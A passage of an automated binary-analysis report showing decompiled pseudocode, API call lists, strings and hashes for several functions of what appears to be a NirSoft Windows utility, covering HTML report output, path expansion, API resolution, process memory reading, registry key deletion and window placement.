					_push(L"<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>");
					_push(0x400);
					_push( &_v2052);
					L0040B1EC();
					_t59 = _t59 + 0x10;
				}
				_t63 =  *0x40fe28; // 0x0
				if(_t63 != 0) {
					wcscpy( &_v4100, L"<table dir=\"rtl\"><tr><td>\r\n");
				}
				E00407AFD(_t57, _t57, _a4,  *((intOrPtr*)( *_t57 + 0x20))(),  &_v2052,  &_v4100);
				_push( *((intOrPtr*)( *_t57 + 0x90))( *((intOrPtr*)( *_t57 + 0x8c))()));
				_push(L"<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
				_push(0x400);
				_push( &_v6148);
				L0040B1EC();
				_t43 = E00407343(_t57, _a4,  &_v6148);
				_t64 = _a8 - 5;
				if(_a8 == 5) {
					return E00407D03(_t57, _t64, _a4);
				}
				return _t43;
			}

















                                                                                      0x004081e4
                                                                                      0x004081ec
                                                                                      0x004081fc
                                                                                      0x00408200
                                                                                      0x00408215
                                                                                      0x0040821c
                                                                                      0x0040822a
                                                                                      0x00408231
                                                                                      0x0040823f
                                                                                      0x00408246
                                                                                      0x0040824b
                                                                                      0x0040824e
                                                                                      0x0040825a
                                                                                      0x0040825c
                                                                                      0x00408261
                                                                                      0x0040826c
                                                                                      0x0040826d
                                                                                      0x0040826e
                                                                                      0x00408273
                                                                                      0x00408273
                                                                                      0x00408276
                                                                                      0x0040827c
                                                                                      0x0040828a
                                                                                      0x00408290
                                                                                      0x004082ab
                                                                                      0x004082c5
                                                                                      0x004082c6
                                                                                      0x004082d1
                                                                                      0x004082d2
                                                                                      0x004082d3
                                                                                      0x004082e7
                                                                                      0x004082ec
                                                                                      0x004082f0
                                                                                      0x00000000
                                                                                      0x004082f5
                                                                                      0x004082fe

                                                                                      APIs
                                                                                      Strings
                                                                                      • <table dir="rtl"><tr><td>, xrefs: 00408284
                                                                                      • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 004082C6
                                                                                      • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00408261
                                                                                      • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 004081F4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: memset$_snwprintf$wcscpy
                                                                                      • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                      • API String ID: 1283228442-2366825230
                                                                                      • Opcode ID: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                                      • Instruction ID: b93c0f476eae2b4120c079c2f39cbc6d180985b1aedf8bde3229837f55527c2f
                                                                                      • Opcode Fuzzy Hash: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                                      • Instruction Fuzzy Hash: 5C2157769001186ACB21AB95CC45FEE77BCFF48745F0440BEB549B3191DB389B848BAD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040920A, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 85%
                                                                                      			E0040920A(wchar_t* __edi, wchar_t* __esi) {
				void _v526;
				long _v528;
				wchar_t* _t17;
				signed int _t40;
				wchar_t* _t50;

				_t50 = __edi;
				if(__esi[0] != 0x3a) {
					_t17 = wcschr( &(__esi[1]), 0x3a);
					if(_t17 == 0) {
						_t40 = E0040488D(__esi, L"\\systemroot");
						if(_t40 < 0) {
							if( *__esi != 0x5c) {
								wcscpy(__edi, __esi);
							} else {
								_v528 = 0;
								memset( &_v526, 0, 0x208);
								E00404C08( &_v528);
								memcpy(__edi,  &_v528, 4);
								__edi[1] = __edi[1] & 0x00000000;
								wcscat(__edi, __esi);
							}
						} else {
							_v528 = 0;
							memset( &_v526, 0, 0x208);
							E00404C08( &_v528);
							wcscpy(__edi,  &_v528);
							wcscat(__edi, __esi + 0x16 + _t40 * 2);
						}
						L11:
						return _t50;
					}
					_push( &(_t17[0]));
					L4:
					wcscpy(_t50, ??);
					goto L11;
				}
				_push(__esi);
				goto L4;
			}








                                                                                      0x0040920a
                                                                                      0x00409218
                                                                                      0x00409223
                                                                                      0x0040922c
                                                                                      0x0040924b
                                                                                      0x00409253
                                                                                      0x0040929b
                                                                                      0x004092e4
                                                                                      0x0040929d
                                                                                      0x004092a3
                                                                                      0x004092b1
                                                                                      0x004092bd
                                                                                      0x004092cc
                                                                                      0x004092d1
                                                                                      0x004092d8
                                                                                      0x004092dd
                                                                                      0x00409255
                                                                                      0x0040925b
                                                                                      0x00409269
                                                                                      0x00409275
                                                                                      0x00409282
                                                                                      0x0040928d
                                                                                      0x00409292
                                                                                      0x004092ec
                                                                                      0x004092ef
                                                                                      0x004092ef
                                                                                      0x00409231
                                                                                      0x00409232
                                                                                      0x00409233
                                                                                      0x00000000
                                                                                      0x00409239
                                                                                      0x0040921a
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • wcschr.MSVCRT ref: 00409223
                                                                                      • wcscpy.MSVCRT ref: 00409233
                                                                                        • Part of subcall function 0040488D: wcslen.MSVCRT ref: 0040489C
                                                                                        • Part of subcall function 0040488D: wcslen.MSVCRT ref: 004048A6
                                                                                        • Part of subcall function 0040488D: _memicmp.MSVCRT ref: 004048C1
                                                                                      • wcscpy.MSVCRT ref: 00409282
                                                                                      • wcscat.MSVCRT ref: 0040928D
                                                                                      • memset.MSVCRT ref: 00409269
                                                                                        • Part of subcall function 00404C08: GetWindowsDirectoryW.KERNEL32(0041C4C0,00000104,?,004092C2,?,?,00000000,00000208,00000000), ref: 00404C1E
                                                                                        • Part of subcall function 00404C08: wcscpy.MSVCRT ref: 00404C2E
                                                                                      • memset.MSVCRT ref: 004092B1
                                                                                      • memcpy.MSVCRT ref: 004092CC
                                                                                      • wcscat.MSVCRT ref: 004092D8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                      • String ID: \systemroot
                                                                                      • API String ID: 4173585201-1821301763
                                                                                      • Opcode ID: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                                      • Instruction ID: 02e88fdf4673b821ef0819f9ed59a437f9dc8f0c8d82ea34f2c30dfda84fedc2
                                                                                      • Opcode Fuzzy Hash: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                                      • Instruction Fuzzy Hash: 0D2198A680530479E614F7A14C8ADAB73ACDF55714F2049BFB515B20C3EB3CA94447AE
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00409C70, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 63librarystringloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 48%
                                                                                      			E00409C70(signed int* _a4) {
				signed int _v8;
				_Unknown_base(*)()* _v12;
				char* _v16;
				int _v18;
				signed int _v20;
				char _v36;
				intOrPtr* _t21;
				struct HINSTANCE__* _t22;
				signed int _t23;
				signed int _t24;
				_Unknown_base(*)()* _t26;
				char* _t28;
				int _t31;

				_t21 = _a4;
				if( *_t21 == 0) {
					_t22 = GetModuleHandleW(L"kernel32.dll");
					_v8 = _t22;
					_t23 = GetProcAddress(_t22, "GetProcAddress");
					 *_a4 = _t23;
					_t24 = _t23 ^ _v8;
					if((_t24 & 0xfff00000) != 0) {
						_t26 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "LdrGetProcedureAddress");
						_v20 = _v20 & 0x00000000;
						_v12 = _t26;
						asm("stosd");
						asm("stosw");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsw");
						_t28 =  &_v36;
						asm("movsb");
						_v16 = _t28;
						_v20 = strlen(_t28);
						_t31 = strlen( &_v36);
						_v18 = _t31;
						_t24 = _v12(_v8,  &_v20, 0, _a4);
					}
					return _t24;
				}
				return _t21;
			}
















                                                                                      0x00409c73
                                                                                      0x00409c7c
                                                                                      0x00409c90
                                                                                      0x00409c9f
                                                                                      0x00409ca2
                                                                                      0x00409ca7
                                                                                      0x00409ca9
                                                                                      0x00409cb1
                                                                                      0x00409cc0
                                                                                      0x00409cc2
                                                                                      0x00409cc7
                                                                                      0x00409ccf
                                                                                      0x00409cd0
                                                                                      0x00409cd7
                                                                                      0x00409cd8
                                                                                      0x00409cd9
                                                                                      0x00409cda
                                                                                      0x00409cdc
                                                                                      0x00409ce0
                                                                                      0x00409ce1
                                                                                      0x00409ce9
                                                                                      0x00409cf1
                                                                                      0x00409cfb
                                                                                      0x00409d08
                                                                                      0x00409d08
                                                                                      0x00000000
                                                                                      0x00409d0d
                                                                                      0x00409d0f

                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                                      • GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                                      • GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                                      • strlen.MSVCRT ref: 00409CE4
                                                                                      • strlen.MSVCRT ref: 00409CF1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProcstrlen
                                                                                      • String ID: GetProcAddress$LdrGetProcedureAddress$kernel32.dll$ntdll.dll
                                                                                      • API String ID: 1027343248-2054640941
                                                                                      • Opcode ID: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                                      • Instruction ID: e4d1d00a07c818a936495f608e4711dda3cd6d1ffd1a72fa6585e5ef64b3ff18
                                                                                      • Opcode Fuzzy Hash: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                                      • Instruction Fuzzy Hash: A311FE72910218EADB01EFE5DC45ADEBBB9EF48710F10446AE900B7250D7B5AA04CBA8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401AC9, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 79%
                                                                                      			E00401AC9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, void* _a8, void* _a12, void* _a16) {
				long _v8;
				int _v12;
				intOrPtr _v16;
				int _v20;
				int _v24;
				char _v28;
				void _v538;
				char _v540;
				int _v548;
				char _v564;
				char _v22292;
				void* __edi;
				void* __esi;
				void* _t37;
				void* _t48;
				void* _t56;
				signed int _t57;
				void* _t67;
				long _t69;
				void* _t70;
				void* _t72;
				void* _t74;
				void* _t76;

				_t67 = __edx;
				E0040B550(0x5714, __ecx);
				_t37 = OpenProcess(0x10, 0, _a16);
				_t82 = _t37;
				_a16 = _t37;
				if(_t37 == 0) {
					_t69 = GetLastError();
				} else {
					_t72 =  &_v22292;
					E0040171F(_t72, _t82);
					_v8 = 0;
					if(ReadProcessMemory(_a16, _a8, _t72, 0x54f4,  &_v8) == 0) {
						_t69 = GetLastError();
					} else {
						_t48 = E00405642( &_v564);
						_t74 = _v548;
						_t70 = _t48;
						_a12 = _t74;
						_v540 = 0;
						memset( &_v538, 0, 0x1fe);
						asm("cdq");
						_push(_t67);
						_push(_t74);
						_push(_t70);
						_push(L"%d  %I64x");
						_push(0xff);
						_push( &_v540);
						L0040B1EC();
						_v548 = 0;
						E004055D1( &_v540,  &_v564);
						_t16 = _t70 + 0xa; // 0xa
						_t68 = _t16;
						_v24 = 0;
						_v12 = 0;
						_v20 = 0;
						_v16 = 0x100;
						_v28 = 0;
						E0040559A( &_v28, _t16);
						_t76 = _v12;
						_t56 = 0x40c4e8;
						if(_t76 != 0) {
							_t56 = _t76;
						}
						_t26 = _t70 + 2; // 0x2
						_t66 = _t70 + _t26;
						_t57 = ReadProcessMemory(_a16, _a12, _t56, _t70 + _t26,  &_v8);
						_t85 = _t76;
						if(_t76 == 0) {
							_t76 = 0x40c4e8;
						}
						E004055F9(_t57 | 0xffffffff,  &_v564, _t76);
						_t69 = E004022D5(_t66, _t68, _t85, _a4,  &_v22292);
						E004055D1(_t61,  &_v28);
					}
					E004055D1(CloseHandle(_a16),  &_v564);
				}
				return _t69;
			}


























                                                                                      0x00401ac9
                                                                                      0x00401ad1
                                                                                      0x00401ae1
                                                                                      0x00401ae7
                                                                                      0x00401ae9
                                                                                      0x00401aec
                                                                                      0x00401c1b
                                                                                      0x00401af2
                                                                                      0x00401af2
                                                                                      0x00401af8
                                                                                      0x00401b0c
                                                                                      0x00401b1a
                                                                                      0x00401bfd
                                                                                      0x00401b20
                                                                                      0x00401b26
                                                                                      0x00401b2b
                                                                                      0x00401b36
                                                                                      0x00401b40
                                                                                      0x00401b43
                                                                                      0x00401b4a
                                                                                      0x00401b54
                                                                                      0x00401b55
                                                                                      0x00401b56
                                                                                      0x00401b57
                                                                                      0x00401b58
                                                                                      0x00401b63
                                                                                      0x00401b68
                                                                                      0x00401b69
                                                                                      0x00401b77
                                                                                      0x00401b7d
                                                                                      0x00401b82
                                                                                      0x00401b82
                                                                                      0x00401b88
                                                                                      0x00401b8b
                                                                                      0x00401b8e
                                                                                      0x00401b91
                                                                                      0x00401b98
                                                                                      0x00401b9b
                                                                                      0x00401ba0
                                                                                      0x00401ba5
                                                                                      0x00401baa
                                                                                      0x00401bac
                                                                                      0x00401bac
                                                                                      0x00401bb2
                                                                                      0x00401bb2
                                                                                      0x00401bbe
                                                                                      0x00401bc4
                                                                                      0x00401bc6
                                                                                      0x00401bc8
                                                                                      0x00401bc8
                                                                                      0x00401bd7
                                                                                      0x00401bee
                                                                                      0x00401bf0
                                                                                      0x00401bf0
                                                                                      0x00401c0e
                                                                                      0x00401c0e
                                                                                      0x00401c23

                                                                                      APIs
                                                                                      • OpenProcess.KERNEL32(00000010,00000000,0040864F,00000000,?,00000000,?,0040864F,?,?,?,00000000), ref: 00401AE1
                                                                                      • ReadProcessMemory.KERNEL32(0040864F,?,?,000054F4,00000000,?,0040864F,?,?,?,00000000), ref: 00401B12
                                                                                      • memset.MSVCRT ref: 00401B4A
                                                                                      • ReadProcessMemory.KERNEL32(?,?,0040C4E8,00000002,00000000), ref: 00401BBE
                                                                                      • _snwprintf.MSVCRT ref: 00401B69
                                                                                        • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                        • Part of subcall function 0040559A: free.MSVCRT(?,00000000,?,004057E1,00000000,?,00000000), ref: 004055AA
                                                                                      • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401BF7
                                                                                      • CloseHandle.KERNEL32(0040864F,?,0040864F,?,?,?,00000000), ref: 00401C02
                                                                                      • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401C15
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: Process$ErrorLastMemoryReadfree$CloseHandleOpen_snwprintfmemset
                                                                                      • String ID: %d %I64x
                                                                                      • API String ID: 2567117392-2565891505
                                                                                      • Opcode ID: 5737760d75e23d64ab9fab178ee98ead68544078704ee144899d5a68802ac3f7
                                                                                      • Instruction ID: f77edfd559f5df329b7cfb23e65bd27f477c8a0de7d8607e39e5f26d9e4a317c
                                                                                      • Opcode Fuzzy Hash: 5737760d75e23d64ab9fab178ee98ead68544078704ee144899d5a68802ac3f7
                                                                                      • Instruction Fuzzy Hash: FE312A72900519EBDB10EF959C859EE7779EF44304F40057AF504B3291DB349E45CBA8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004045BA, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 63registryCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 39%
                                                                                      			E004045BA(void* __ebx, void* __ecx, void* __eflags) {
				void* _v8;
				void _v2054;
				short _v2056;
				void _v4102;
				short _v4104;
				signed int _t28;
				void* _t34;

				E0040B550(0x1004, __ecx);
				_t36 = 0;
				if(E004043F8( &_v8, 0x2001f) == 0) {
					_v2056 = 0;
					memset( &_v2054, 0, 0x7fe);
					_v4104 = 0;
					memset( &_v4102, 0, 0x7fe);
					_t34 = __ebx + 0x20a;
					_push(_t34);
					_push(__ebx);
					_push(L"%s\\shell\\%s\\command");
					_push(0x3ff);
					_push( &_v2056);
					L0040B1EC();
					_push(_t34);
					_push(__ebx);
					_push(L"%s\\shell\\%s");
					_push(0x3ff);
					_push( &_v4104);
					L0040B1EC();
					RegDeleteKeyW(_v8,  &_v2056);
					_t28 = RegDeleteKeyW(_v8,  &_v4104);
					asm("sbb esi, esi");
					_t36 =  ~_t28 + 1;
					RegCloseKey(_v8);
				}
				return _t36;
			}










                                                                                      0x004045c2
                                                                                      0x004045d1
                                                                                      0x004045da
                                                                                      0x004045ef
                                                                                      0x004045f6
                                                                                      0x00404604
                                                                                      0x0040460b
                                                                                      0x00404610
                                                                                      0x00404616
                                                                                      0x00404617
                                                                                      0x00404618
                                                                                      0x00404628
                                                                                      0x00404629
                                                                                      0x0040462a
                                                                                      0x0040462f
                                                                                      0x00404630
                                                                                      0x00404631
                                                                                      0x0040463c
                                                                                      0x0040463d
                                                                                      0x0040463e
                                                                                      0x00404656
                                                                                      0x00404662
                                                                                      0x0040466b
                                                                                      0x0040466d
                                                                                      0x0040466e
                                                                                      0x00404674
                                                                                      0x00404679

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: Delete_snwprintfmemset$Close
                                                                                      • String ID: %s\shell\%s$%s\shell\%s\command
                                                                                      • API String ID: 1018939227-3575174989
                                                                                      • Opcode ID: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                                      • Instruction ID: ac83cb79e3d5854fe24d0bbfc9a3a323e310d753dc8b3985e5e0c668aff5e890
                                                                                      • Opcode Fuzzy Hash: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                                      • Instruction Fuzzy Hash: 2F115E72800128BACB2097958D45ECBBABCEF49794F0001B6BA08F2151D7745F449AED
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040313D, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 58%
                                                                                      			E0040313D(void* __ecx) {
				intOrPtr _v8;
				char _v12;
				struct HWND__* _t6;
				_Unknown_base(*)()* _t11;
				struct HWND__* _t15;
				void* _t20;
				struct HINSTANCE__* _t23;

				_v12 = 8;
				_v8 = 0xff;
				_t15 = 0;
				_t20 = 0;
				_t23 = LoadLibraryW(L"comctl32.dll");
				if(_t23 == 0) {
					L5:
					__imp__#17();
					_t6 = 1;
					L6:
					if(_t6 != 0) {
						return 1;
					} else {
						MessageBoxW(_t6, L"Error: Cannot load the common control classes.", L"Error", 0x30);
						return 0;
					}
				}
				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
				if(_t11 != 0) {
					_t20 = 1;
					_t15 =  *_t11( &_v12);
				}
				FreeLibrary(_t23);
				if(_t20 == 0) {
					goto L5;
				} else {
					_t6 = _t15;
					goto L6;
				}
			}










                                                                                      0x0040314a
                                                                                      0x00403151
                                                                                      0x00403158
                                                                                      0x0040315a
                                                                                      0x00403162
                                                                                      0x00403166
                                                                                      0x00403190
                                                                                      0x00403190
                                                                                      0x00403198
                                                                                      0x00403199
                                                                                      0x0040319e
                                                                                      0x004031bb
                                                                                      0x004031a0
                                                                                      0x004031ad
                                                                                      0x004031b6
                                                                                      0x004031b6
                                                                                      0x0040319e
                                                                                      0x0040316e
                                                                                      0x00403176
                                                                                      0x0040317c
                                                                                      0x0040317f
                                                                                      0x0040317f
                                                                                      0x00403182
                                                                                      0x0040318a
                                                                                      0x00000000
                                                                                      0x0040318c
                                                                                      0x0040318c
                                                                                      0x00000000
                                                                                      0x0040318c

                                                                                      APIs
                                                                                      • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                                      • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                                      • #17.COMCTL32(?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403190
                                                                                      • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: Library$AddressFreeLoadMessageProc
                                                                                      • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                      • API String ID: 2780580303-317687271
                                                                                      • Opcode ID: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                                      • Instruction ID: 155fb52d9805f4d7e0650ae201b0fcd9156dc3619c14d31e00ff2d1348fe2513
                                                                                      • Opcode Fuzzy Hash: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                                      • Instruction Fuzzy Hash: 5A01D672751201EAD3115FB4AC89F7B7EACDF4974AB00023AF505F51C0DA78DA01869C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00404DA9, Relevance: 15.1, APIs: 10, Instructions: 111COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 85%
                                                                                      			E00404DA9(void* __edx, struct HWND__* _a4, signed int _a8) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				int _t50;
				long _t61;
				struct HDC__* _t63;
				intOrPtr _t65;
				intOrPtr _t68;
				struct HWND__* _t71;
				intOrPtr _t72;
				void* _t73;
				int _t74;
				int _t80;
				int _t83;

				_t73 = __edx;
				_v8 = 0;
				_v12 = 0;
				_t74 = GetSystemMetrics(0x11);
				_t80 = GetSystemMetrics(0x10);
				if(_t74 == 0 || _t80 == 0) {
					_t63 = GetDC(0);
					_t80 = GetDeviceCaps(_t63, 8);
					_t74 = GetDeviceCaps(_t63, 0xa);
					ReleaseDC(0, _t63);
				}
				GetWindowRect(_a4,  &_v44);
				if((_a8 & 0x00000004) != 0) {
					_t71 = GetParent(_a4);
					if(_t71 != 0) {
						_v28.left = _v28.left & 0x00000000;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						GetWindowRect(_t71,  &_v28);
						_t61 = _v28.left;
						_t72 = _v28.top;
						_t80 = _v28.right - _t61 + 1;
						_t74 = _v28.bottom - _t72 + 1;
						_v8 = _t61;
						_v12 = _t72;
					}
				}
				_t65 = _v44.right;
				if((_a8 & 0x00000001) == 0) {
					asm("cdq");
					_t83 = (_v44.left - _t65 + _t80 - 1 - _t73 >> 1) + _v8;
				} else {
					_t83 = 0;
				}
				_t68 = _v44.bottom;
				if((_a8 & 0x00000002) != 0) {
					L11:
					_t50 = 0;
					goto L12;
				} else {
					asm("cdq");
					_t50 = (_v44.top - _t68 + _t74 - 1 - _t73 >> 1) + _v12;
					if(_t50 >= 0) {
						L12:
						if(_t83 < 0) {
							_t83 = 0;
						}
						return MoveWindow(_a4, _t83, _t50, _t65 - _v44.left + 1, _t68 - _v44.top + 1, 1);
					}
					goto L11;
				}
			}


















                                                                                      0x00404da9
                                                                                      0x00404dbc
                                                                                      0x00404dbf
                                                                                      0x00404dc6
                                                                                      0x00404dcc
                                                                                      0x00404dce
                                                                                      0x00404de1
                                                                                      0x00404deb
                                                                                      0x00404df2
                                                                                      0x00404df4
                                                                                      0x00404df4
                                                                                      0x00404e07
                                                                                      0x00404e0d
                                                                                      0x00404e18
                                                                                      0x00404e1c
                                                                                      0x00404e1e
                                                                                      0x00404e27
                                                                                      0x00404e28
                                                                                      0x00404e29
                                                                                      0x00404e2f
                                                                                      0x00404e31
                                                                                      0x00404e37
                                                                                      0x00404e41
                                                                                      0x00404e42
                                                                                      0x00404e43
                                                                                      0x00404e46
                                                                                      0x00404e46
                                                                                      0x00404e1c
                                                                                      0x00404e4d
                                                                                      0x00404e50
                                                                                      0x00404e5f
                                                                                      0x00404e66
                                                                                      0x00404e52
                                                                                      0x00404e52
                                                                                      0x00404e52
                                                                                      0x00404e6d
                                                                                      0x00404e70
                                                                                      0x00404e85
                                                                                      0x00404e85
                                                                                      0x00000000
                                                                                      0x00404e72
                                                                                      0x00404e7b
                                                                                      0x00404e80
                                                                                      0x00404e83
                                                                                      0x00404e87
                                                                                      0x00404e89
                                                                                      0x00404e8b
                                                                                      0x00404e8b
                                                                                      0x00404ea8
                                                                                      0x00404ea8
                                                                                      0x00000000
                                                                                      0x00404e83

                                                                                      APIs
                                                                                      • GetSystemMetrics.USER32 ref: 00404DC2
                                                                                      • GetSystemMetrics.USER32 ref: 00404DC8
                                                                                      • GetDC.USER32(00000000), ref: 00404DD5
                                                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 00404DE6
                                                                                      • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00404DED
                                                                                      • ReleaseDC.USER32 ref: 00404DF4
                                                                                      • GetWindowRect.USER32 ref: 00404E07
                                                                                      • GetParent.USER32(?), ref: 00404E12
                                                                                      • GetWindowRect.USER32 ref: 00404E2F
                                                                                      • MoveWindow.USER32(?,?,00000000,?,?,00000001), ref: 00404E9E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                      • String ID:
                                                                                      • API String ID: 2163313125-0
